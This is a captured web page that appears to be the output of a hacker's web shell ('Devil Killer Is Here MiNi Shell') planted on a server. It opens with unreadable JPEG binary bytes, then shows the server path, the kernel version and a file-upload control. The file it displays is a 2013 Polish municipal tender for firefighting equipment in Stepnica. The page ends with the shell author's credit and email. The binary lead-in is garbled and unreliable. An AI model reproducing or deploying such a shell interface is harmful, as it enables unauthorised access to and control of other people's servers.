JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/26255-N-2013.html

<p class="kh_header"><b>Stepnica: Zakup i dostawa sprzętu pożarniczego na potrzeby OSP w Stepnicy</b><br>
<b>Numer ogłoszenia: 26255 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stepnica , ul. Kościuszki 4, 72-112 Stepnica, woj. zachodniopomorskie, tel. 091 4188521, faks 091 4188580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stepnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu pożarniczego na potrzeby OSP w Stepnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa sprzętu pożarniczego na potrzeby OSP w Stepnicy 
Zakres
WYPOSAŻENIE POŻARNICZE

1.	Kamizelki ostrzegawcze
Koloru pomarańczowego  z taśmą odblaskową	6 szt.	
2.	Rękawiczki  ochronne lateksowe jednorazowe	100szt.	
3.	Ubranie specjalne chroniące przed promieniowaniem cieplnym i płomieniem, typ 3	2 szt.	wymagany atest CNBOP
4.	Buty kanalizacyjne 
z długą cholewą	2 pary	
5.	Kalosze  do brodzenia  typu  wodery
 Spodnio-wodery tzw. wędkarskie	2 pary	
6.	Linki bezpieczeństwa min. 30 m w pokrowcu	2 szt.	wymagany atest CNBOP
7.	Sprzęt gaśniczy podręczny		
8.	Hydronetka 10l	1 szt.	
9.	Koc gaśniczy	1 szt.	wymagany atest CNBOP
10.	Gaśnica  proszkowa ABC min 5 kg	2 szt.	
11.	Gaśnica  śniegowa  (C02) 6 kg	1 szt.	
	Węże, armatura i osprzęt 		
12.	Wąż tłoczny W 75 [5m] ŁA	4 szt.	
13.	Wąż  tłoczny  W75-20 
Ciśnienie robocze min. 8 atm.	14 szt.	
14.	Wąż  tłoczny W52-20 ŁA  
Ciśnienie  robocze  min. 8 atm.  	10 szt.	
15.	Wąż  ssawny 110-2500 ŁA 	2 szt.	
16.	Noszak do węży 
w-52
w-75	
1 szt.
1 szt.	
17.	Podpinki wężowe	5 szt.	wymagany atest CNBOP
18.	Siodełko wężowe uniwersalne 	2 szt.	
19.	Prądownice wodno - pianowe klasy Turbo Jet z nasadą 52 z regulacją wydajności	2 szt.	
20.	Prądownica wodna - pianowa klasy Turbo Jet z nasadą 75 regulacją wydajności	2 szt.	
21.	Prądownica pianowa klasy PP - 2/15	1 szt.	
22.	Prądownica pianowa klasy PP - 4	1 szt.	
23.	Przełącznik 110/75	2 szt.	
24.	Przełącznik 75/52	4 szt.	
25.	Zbieracz 2x75/110	1 szt.	
26.	Rozdzielacz kulowe 75/52-75-52	2 szt.	
27.	Stojak hydrantowy  O80  krótki z kluczem	1 szt.	
28.	Wytwornica piany WP 2/150	2 szt.	
29.	Wytwornica pianowa klasy WP-4/75	1 szt.	
30.	Klucz do hydrantów nadziemnych	1 szt.	
31.	Klucz do hydrantów podziemnych	1 szt.	
32.	Klucze do łączników pożarniczych	2 szt.	
33.	Smok ssawny 110 z koszem  - skośne	2 szt.	
34.	Pływak z zatrzaśnikiem	2 szt. 	
35.	Linki do smoka i linii ssawnej  długość min. 20 m	2 szt.	
36.	Wysysacz głębinowy
O zmiennej regulacji konta ustawienia	2 szt.	
37.	Klucz do pokryw kanałowych	2 szt.	
38.	Mostki przejazdowe	4 szt.	
39.	Kurtyna wodna wielkości 75	1 szt.	
40	Kurtyna wodna wielkości 52	1 szt.	
41.	Zbiornik wodny przenośny o pojemności 5000 dm3 brezentowy ze składanym stelażem, korkiem spustowym i pokrowcem do przechowywania.	1 szt.	
42.	Agregat spalinowy oddymiający, napędzany etyliną, o wydajności min. 40 tyś m3/h(min.), z rękawem dł. min. 10 m, moc silnika min. 5,5 kM 	1 szt.	
43.	Motopompa  pływająca  z nasadą tłoczną O 75, minimalny słup wody 30 m, moc silnika min. 5,5 kM, min. Wydajność 800 l/min.	1  szt.	
	Sprzęt i narzędzia ratownicze 		
44.	Bosak podręczny	1 sztl.	
45.	Drabina aluminiowa DW 14 dwu lub trzy-przęsłowa	1 szt.	wymagany atest CNBOP
46.	Bosak lekki ogólnego przeznaczenia  trzon wykonany z drzewa  wytrzymałego na naprężenia boczne	1 szt.	
47.	Bosak sufitowy	1 kpl.	
48.	Łom  uniwersalny  -wykorzystywany do otwierania (wywarzania)  drzwi   minimalna długość  1 m	1 szt.	
49.	Przecinarka  ratownicza  lub równoważna do stali i betonu o napędzie spalinowym z tarczami różnych typów. Średnica tarczy min.300 mm-1 kpl.,lub z możliwością mocowania prowadnicy z łańcuchem widiowym  do cięcia żelbetonu.   Moc silnika min.4,5 KM.	1 szt.	
50.	Pilarka do drewna  lub równoważna spalinowa  z dodatkową  prowadnicą  krótką i długą ,łańcuchem oraz kanistrem dzielonym (olej/mieszanka/ - 1 kpl. Moc silnika  min 4,5 KM	1 szt	
51.	Siekierołom / Inopur	1 kpl.	wymagany atest CNBOP
52.	Nożyce do prętów, kłódek i łańcuchów (minimalna średnica 10 mm)	1 szt.	
53.	Kilof- trzonek drewniany	1 szt.	
54.	Widły cztero-zębne   o  trzonku ergonomicznym metalowym (rurka)	2 szt.	
55.	Szufla o trzonku  ergonomicznym metalowym (rurka)	1 szt.	
56.	Młot 10 kg o trzonku drewnianym lub metalowym	1 szt.	
57.	Sztychówka (szpadel) o trzonku ergonomicznym metalowym (rurka)	2 szt.	
58.	Rak do blach	1 szt.	
59.	Topór strażacki ciężki 
Toporzysko ergonomiczne drewniane lub z tworzywa sztucznego	1 szt.	
60.	Siekierka 
Toporzysko ergonomiczne drewniane lub z tworzywa sztucznego	1 szt.	
61.	Drabina nasadkowa  DN 2,7 drewniana  lub aluminiowa	3 przęsła	wymagany atest CNBOP
62.	Drabina słupkowa  D 3,1 drewniana lub aluminiowa	1 szt.	wymagany atest CNBOP
	
Sprzęt medyczny 		
63.	Zestaw do udzielania pierwszej pomocy medycznej PSP R-1 	1 kpl.	
64.	Deska ratownicza kompletna  + szyny Kramera	1 kpl.	
65.	Folie czarne PCV ( worki do zabezpieczania zwłok z zamkiem suwakowym)	4 szt.	
66.	Koce antyhipotermiczne	6 szt.	
	Sprzęt  pomocniczy		
67.	Kanister na paliwo z PE 5 l (na mieszankę do pilarki) z atestem	2 szt.	
68.	Kanister na paliwo 10 l. (paliwo do agregatu) - z atestem	1 szt.	
69.	Kliny pod koła	4 szt.	
70.	Lampa ostrzegawcza drogowa (LED) o zmiennej częstotliwości świecenia	6 szt.	
71.	Pałka świetlna  o zmiennej  kolorystyce	2 szt.	
72.	Stożek uliczny	6 szt.	

73.	
Najaśnica przenośna 2 x 500W + przedłużacz 40m + Maszt przenośny do najaśnic o wysokości min. 4m z możliwością bezstopniowej regulacji. Maszt rozkładany ręcznie, konstrukcja zapewniająca stabilne ustawienie w terenie. Głowica (poprzeczka) z możliwością mocowania 2 najaśnic. Złącza elektryczne kompatybilne z agregatem prądotwórczym.	
1 kpl.	

Uwaga: Wszystkie elementy przedmiotu zamówienia wymienione w specyfikacji  muszą być fabrycznie nowe  oraz być wyprodukowane w 2013 r.  
Wszystkie urządzenia mechaniczne muszą posiadać instrukcję obsługi w j. polskim. 
Okres gwarancji na wszystkie elementy wymienione w specyfikacji min. 24 miesiące.

Ewentualne podane w opisach nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. nr 113, poz. 759  z późniejszymi zmianami) a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego i funkcjonalnego założonego w projekcie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu                                  z art. 22 Prawa zamówień publicznych - załącznik nr 2 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	zmiana obowiązującej stawki VAT:
a)	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
b)	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
2.	 rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy: 
            W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone,   
            przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz 
            udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy   
           planowanymi świadczeniami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stepnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Stepnica z siedzibą w Urzędzie Gminy w Stepnicy
          ul. Kościuszki 4
          72-112  Stepnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 09:00, miejsce: Gmina Stepnica z siedzibą w Urzędzie Gminy w Stepnicy
          ul. Kościuszki 4
          72-112  Stepnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany z Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com